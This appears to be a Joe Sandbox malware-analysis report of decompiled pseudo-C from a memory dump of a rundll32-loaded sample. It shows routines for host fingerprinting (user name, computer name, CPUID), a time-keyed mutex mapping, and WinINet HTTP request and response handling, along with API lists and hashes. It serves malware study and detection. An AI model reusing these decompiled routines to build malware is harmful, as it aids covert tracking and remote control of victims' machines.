0x02e35205
0x02e3520b
0x02e35214
0x02e3521f
0x02e3521f
0x02e35216
0x02e35216
0x02e3521d
0x00000000
0x00000000
0x02e3521d
0x02e35229
0x00000000
0x02e3522d
0x02e35232
0x02e3523d
0x02e3523d
0x02e35245
0x02e3524b
0x02e35253
0x02e3525c
0x02e35263
0x02e35267
0x02e3526c
0x02e35272
0x00000000
0x00000000
0x02e35274
0x02e35278
0x02e3527f
0x00000000
0x02e35281
0x02e35291
0x02e35291
0x00000000
0x02e352c2
0x02e352c2
0x02e352c7
0x02e352e6
0x02e352e8
0x02e352ed
0x02e352ee
0x00000000
0x02e352c9
0x02e352c9
0x02e352cf
0x00000000
0x02e352d1
0x02e352d1
0x02e352d6
0x02e352d8
0x02e352dd
0x02e352de
0x02e352f4
0x02e352f4
0x02e352fc
0x02e3530a
0x02e3530e
0x02e3531a
0x02e3531c
0x02e35320
0x02e35322
0x00000000
0x02e35328
0x00000000
0x02e35328
0x02e35322
0x02e352cf
0x00000000
0x02e352c7
0x02e35295
0x02e35297
0x02e3529b
0x02e3529c
0x02e3529c
0x02e352a0
0x02e352aa
0x02e352aa
0x02e352b0
0x02e352b3
0x02e352b3
0x02e352ba
0x02e352ba
0x02e35341
0x00000000

APIs

memset.NTDLL ref: 02E35194
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 02E351A0
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 02E351C8
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 02E351E8
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,02E31273,?), ref: 02E35203
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,02E31273,?,00000000), ref: 02E352AA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,02E31273,?,00000000,?,?), ref: 02E352BA
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 02E352F4
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 02E3530E
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02E3531A

Part of subcall function 02E361FE: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04EA93D8,00000000,?,7476F710,00000000,7476F730), ref: 02E3624D
Part of subcall function 02E361FE: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04EA9410,?,00000000,30314549,00000014,004F0053,04EA93CC), ref: 02E362EA
Part of subcall function 02E361FE: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02E3521B), ref: 02E362FC

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,02E31273,?,00000000,?,?), ref: 02E3532D

Strings

@MqtNqt, xrefs: 02E3532D
Uqt, xrefs: 02E352AA

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID: Uqt$@MqtNqt
API String ID: 3521023985-3266969629
Opcode ID: 5ee087b1ffef43c233194b2d6dd785a86a7abd41681961760869e3d15c2d29bf
Instruction ID: 96d15ac35d19b001a61d3c5b11f40de3ca9fac4db6c9274795179ff37b4b2d19
Opcode Fuzzy Hash: 5ee087b1ffef43c233194b2d6dd785a86a7abd41681961760869e3d15c2d29bf
Instruction Fuzzy Hash: 0B517E71488314AFC7129F12DC48D9BBBF8FF89325F909E1AF8A982250D7708594CF92

Uniqueness

Uniqueness Score: -1.00%

Function 02E37F95 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 209
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E02E37F95(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x2e30000;
				_t115 = _t139[3] + 0x2e30000;
				_t131 = _t139[4] + 0x2e30000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x2e30000;
				_v16 = _t139[5] + 0x2e30000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x2e30002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x2e3a1c0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x2e3a1c0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x2e3a1c0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x2e3a1bc; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x2e3a1c0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x2e3a1b8; // 0x0
										 *_t102 = _t125;
										 *0x2e3a1b8 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x2e3a1bc; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x02e37fa4
0x02e37fba
0x02e37fc0
0x02e37fc2
0x02e37fc7
0x02e37fcd
0x02e37fd2
0x02e37fd5
0x02e37fe3
0x02e37fea
0x02e37fed
0x02e37ff0
0x02e37ff1
0x02e37ff4
0x02e37ff7
0x02e37ffa
0x02e37fff
0x02e3800e
0x00000000
0x02e38014
0x02e3801e
0x02e38028
0x02e3802d
0x02e3802f
0x02e38039
0x02e3803c
0x02e3803f
0x02e38045
0x02e38047
0x02e38047
0x02e3804a
0x02e3804d
0x02e38052
0x02e38056
0x02e38069
0x02e3806b
0x02e38113
0x02e38113
0x02e3811a
0x02e3811d
0x02e38127
0x02e38127
0x02e3812b
0x02e381a9
0x02e381ac
0x02e381ae
0x02e381ae
0x02e381b5
0x02e381b7
0x02e381c1
0x02e381c4
0x02e381c7
0x02e381c7
0x00000000
0x02e3812d
0x02e38130
0x02e3815e
0x02e38168
0x02e3816c
0x02e38174
0x02e38177
0x02e3817e
0x02e38188
0x02e38188
0x02e3818c
0x02e38191
0x02e381a0
0x02e381a6
0x02e381a6
0x02e3818c
0x00000000
0x02e38137
0x02e3813a
0x02e38142
0x02e38157
0x02e3815c
0x00000000
0x00000000
0x02e3815c
0x00000000
0x02e38142
0x02e38130
0x02e3812b
0x02e38071
0x02e38078
0x02e38088
0x02e3808b
0x02e38091
0x02e38095
0x02e380d8
0x02e380e4
0x02e3810d
0x02e380e6
0x02e380ea
0x02e380f0
0x02e380f8
0x02e380fa
0x02e380fd
0x02e38103
0x02e38105
0x02e38105
0x02e380f8
0x02e380ea
0x00000000
0x02e380e4
0x02e3809d
0x02e380a0
0x02e380a7
0x02e380b7
0x02e380ba
0x02e380ca
0x00000000
0x02e380d0
0x02e380b1
0x02e380b5
0x00000000
0x00000000
0x00000000
0x02e380b5
0x02e38082
0x02e38086
0x00000000
0x00000000
0x00000000
0x02e38086
0x02e3805f
0x02e38063
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 02E3800E
LoadLibraryA.KERNEL32(?), ref: 02E3808B
GetLastError.KERNEL32 ref: 02E38097
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 02E380CA

Strings

@MqtNqt, xrefs: 02E38097, 02E3816E
$, xrefs: 02E37FE3

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $$@MqtNqt
API String ID: 948315288-516465142
Opcode ID: caebba7bdc559eab84df193cd5f4d9ead1122eb9cd45a744eeb535f7459a9b6c
Instruction ID: 3ea259694a8d13174cd6f55d35827d4db0bc78af4af4ff6ef1c086af63b0dd33
Opcode Fuzzy Hash: caebba7bdc559eab84df193cd5f4d9ead1122eb9cd45a744eeb535f7459a9b6c
Instruction Fuzzy Hash: 2A812971A802099FDB21CF99C988BAEB7F5BB48306F149429F505E7340E7B0E984CF60

Uniqueness

Uniqueness Score: -1.00%

Function 02E360A1 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E02E360A1(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L02E382A4();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x2e3a348; // 0x206d5a8
				_t5 = _t13 + 0x2e3b87a; // 0x4ea8e22
				_t6 = _t13 + 0x2e3b594; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L02E37F0A();
				_t17 = CreateFileMappingW(0xffffffff, 0x2e3a34c, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x02e360a1
0x02e360a9
0x02e360ad
0x02e360b3
0x02e360b8
0x02e360bd
0x02e360c0
0x02e360c3
0x02e360c8
0x02e360c9
0x02e360cc
0x02e360d1
0x02e360d8
0x02e360e2
0x02e360e4
0x02e360e5
0x02e360e8
0x02e36104
0x02e3610a
0x02e3610e
0x02e3615c
0x02e36110
0x02e3611d
0x02e3612d
0x02e36135
0x02e36147
0x02e3614b
0x00000000
0x00000000
0x02e36137
0x02e3613a
0x02e3613f
0x02e36141
0x02e36141
0x02e3611f
0x02e36121
0x02e3614d
0x02e3614e
0x02e3614e
0x02e3611d
0x02e36163

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,02E3113B,?,?,4D283A53,?,?), ref: 02E360AD
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 02E360C3
_snwprintf.NTDLL ref: 02E360E8
CreateFileMappingW.KERNELBASE(000000FF,02E3A34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 02E36104
GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,02E3113B,?,?,4D283A53,?), ref: 02E36116
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 02E3612D
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,02E3113B,?,?,4D283A53), ref: 02E3614E
GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,02E3113B,?,?,4D283A53,?), ref: 02E36156

Strings

@MqtNqt, xrefs: 02E36156

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID: @MqtNqt
API String ID: 1814172918-2883916605
Opcode ID: 32dc9f8c46763ff7d3a23f79f836dbbb3a50ffcfe0147cf1047f03e7a1a99b37
Instruction ID: 98e8121bca0a2e00874114039fe4be27b721b46ca34bd7796ba77818f71a4a83
Opcode Fuzzy Hash: 32dc9f8c46763ff7d3a23f79f836dbbb3a50ffcfe0147cf1047f03e7a1a99b37
Instruction Fuzzy Hash: FF21E472EC0208BBD7229B75CC0DF9E77BDAB4471AF114025F609E7292DBB09A54CB64

Uniqueness

Uniqueness Score: -1.00%

Function 02E354EC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E02E354EC(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x2e3a310; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E02E33B9D( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x2e3a344 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x2e3a2d8, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E02E37194(_v8 + _v8, _t64);
							}
							HeapFree( *0x2e3a2d8, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x2e3a2d8, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E02E37194(_v8 + _v8, _t64);
						}
						HeapFree( *0x2e3a2d8, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x02e354ec
0x02e354f4
0x02e354f8
0x02e354fb
0x02e35500
0x02e35502
0x02e35507
0x02e35507
0x02e3550d
0x02e3550f
0x02e3551c
0x02e3557d
0x02e3551e
0x02e35523
0x02e35529
0x02e3552e
0x02e3553c
0x02e35540
0x02e3554f
0x02e35556
0x02e3555d
0x02e3555d
0x02e35568
0x02e35568
0x02e35540
0x02e3552e
0x02e3557f
0x02e35585
0x02e3558f
0x02e35591
0x02e35596
0x02e355a5
0x02e355a9
0x02e355b4
0x02e355bb
0x02e355c2
0x02e355c2
0x02e355ce
0x02e355ce
0x02e355a9
0x02e355d9
0x02e355db
0x02e355de
0x02e355e0
0x02e355e3
0x02e355e6
0x02e355f0
0x02e355f4
0x02e355f8

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 02E35523
RtlAllocateHeap.NTDLL(00000000,?), ref: 02E3553A
GetUserNameW.ADVAPI32(00000000,?), ref: 02E35547
HeapFree.KERNEL32(00000000,00000000), ref: 02E35568
GetComputerNameW.KERNEL32(00000000,00000000), ref: 02E3558F
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02E355A3
GetComputerNameW.KERNEL32(00000000,00000000), ref: 02E355B0
HeapFree.KERNEL32(00000000,00000000), ref: 02E355CE

Strings

Uqt, xrefs: 02E35568, 02E355CE

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID: Uqt
API String ID: 3239747167-2320327147
Opcode ID: f90c70623b633ac3946ff3319dc98070fdb83836b82ec06a6c369a27e88b335f
Instruction ID: bdbc25240f59586c476f6c5da275d138f40e51d29824c914b6557d3bfc77103a
Opcode Fuzzy Hash: f90c70623b633ac3946ff3319dc98070fdb83836b82ec06a6c369a27e88b335f
Instruction Fuzzy Hash: 75315072A80209EFD711DF6ACC88A6EB7FAFF48206FA08469E545D7210D770E991DF10

Uniqueness

Uniqueness Score: -1.00%

Function 02E34F4B Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 124
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E02E34F4B(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void _v20;
				void* __esi;
				void* _t30;
				void* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				int _t45;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					if(InternetReadFile( *(_t69 + 0x18),  &_v20, 4,  &_v8) != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x2e3a174(0, 1,  &_v12); // executed
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E02E37A71(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_t45 = InternetReadFile( *(_t69 + 0x18), _v16, 0x1000,  &_v8); // executed
										if(_t45 != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E02E32129( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E02E3789E(_v16);
										if(_t64 == 0) {
											_t64 = E02E345DF(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E02E32129( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E02E34E4D(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}

0x02e34f4b
0x02e34f4c
0x02e34f52
0x02e34f5d
0x02e34f5d
0x02e34f5f
0x02e37625
0x02e3762a
0x02e3762c
0x02e37643
0x02e37674
0x02e37679
0x02e3773c
0x02e3767f
0x02e37686
0x02e3768e
0x02e37739
0x02e37694
0x02e37699
0x02e3769e
0x02e376a3
0x02e3772b
0x02e376a9
0x02e376a9
0x02e376ab
0x02e376b1
0x02e376b2
0x02e376b2
0x02e376b5
0x02e376b8
0x02e376be
0x02e376cf
0x02e376d7
0x00000000
0x00000000
0x02e376df
0x02e376e7
0x02e376f3
0x02e376f7
0x02e376f9
0x02e376fe
0x00000000
0x00000000
0x02e376fe
0x02e376f7
0x02e37710
0x02e37713
0x02e3771a
0x02e37725
0x02e37725
0x00000000
0x02e37700
0x02e37700
0x02e37705
0x02e37707
0x02e37708
0x02e3770b
0x00000000
0x02e3770b
0x00000000
0x02e37705
0x02e376b2
0x02e3772c
0x02e3772c
0x02e37732
0x02e37732
0x02e3768e
0x02e37645
0x02e3764b
0x02e37653
0x02e3766c
0x02e3766e
0x00000000
0x00000000
0x02e37655
0x02e3765f
0x02e37663
0x02e37669
0x00000000
0x02e37669
0x02e37663
0x02e37653
0x02e37745
0x02e34f54
0x02e34f54
0x02e34f5b
0x02e34f66
0x00000000
0x00000000
0x00000000
0x02e34f5b

APIs

ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,747581D0,00000000,00000000), ref: 02E3762C
InternetReadFile.WININET(?,?,00000004,?), ref: 02E3763B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,02E33897,00000000,?,?), ref: 02E37645
ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02E33897,00000000,?), ref: 02E376BE
InternetReadFile.WININET(?,?,00001000,?), ref: 02E376CF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,02E33897,00000000,?,?), ref: 02E376D9

Part of subcall function 02E34E4D: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,747581D0,00000000,00000000), ref: 02E34E64
Part of subcall function 02E34E4D: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02E33897,00000000,?), ref: 02E34E74
Part of subcall function 02E34E4D: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 02E34EA6
Part of subcall function 02E34E4D: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02E34ECB
Part of subcall function 02E34E4D: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02E34EEB

Strings

@MqtNqt, xrefs: 02E37645, 02E376D9

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: EventHttpInfoQuery$ErrorFileInternetLastReadReset$ObjectSingleWait
String ID: @MqtNqt
API String ID: 2393427839-2883916605
Opcode ID: 48260c1cb5faaa383460f05ff96f6224f2238da45d06a732b03da835d5ab1349
Instruction ID: 4708283d1dcfaa607b0772408382af81a6f4bc1029d7f06c0e55943a7fcd1072
Opcode Fuzzy Hash: 48260c1cb5faaa383460f05ff96f6224f2238da45d06a732b03da835d5ab1349
Instruction Fuzzy Hash: 9F41F772A80208AFDB239BA5CC4CBAEF7BAAF84357F109924F551D7190DB70D941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02E32C73 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E02E32C73(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E02E3452E(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E02E37B59(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x02e32c73
0x02e32c80
0x02e32c82
0x02e32ce5
0x00000000
0x02e32ce5
0x02e32c9a
0x02e32ca1
0x02e32cad
0x02e32cb2
0x02e32cc8
0x02e32cd8
0x00000000
0x02e32cca
0x02e32cca
0x02e32cd1
0x02e32cde
0x02e32cde
0x02e32cde
0x02e32cd1
0x02e32cc8
0x02e32ce3
0x00000000
0x00000000
0x02e32ce9

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,02E35D46,?,?,747581D0,00000000), ref: 02E32CAD
ResetEvent.KERNEL32(?), ref: 02E32CB2
HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 02E32CBF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,02E33897,00000000,?,?), ref: 02E32CCA
GetLastError.KERNEL32(?,?,00000102,02E35D46,?,?,747581D0,00000000), ref: 02E32CE5

Part of subcall function 02E3452E: lstrlen.KERNEL32(00000000,00000008,?,74714D40,?,?,02E32C92,?,?,?,?,00000102,02E35D46,?,?,747581D0), ref: 02E3453A
Part of subcall function 02E3452E: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02E32C92,?,?,?,?,00000102,02E35D46,?), ref: 02E34598
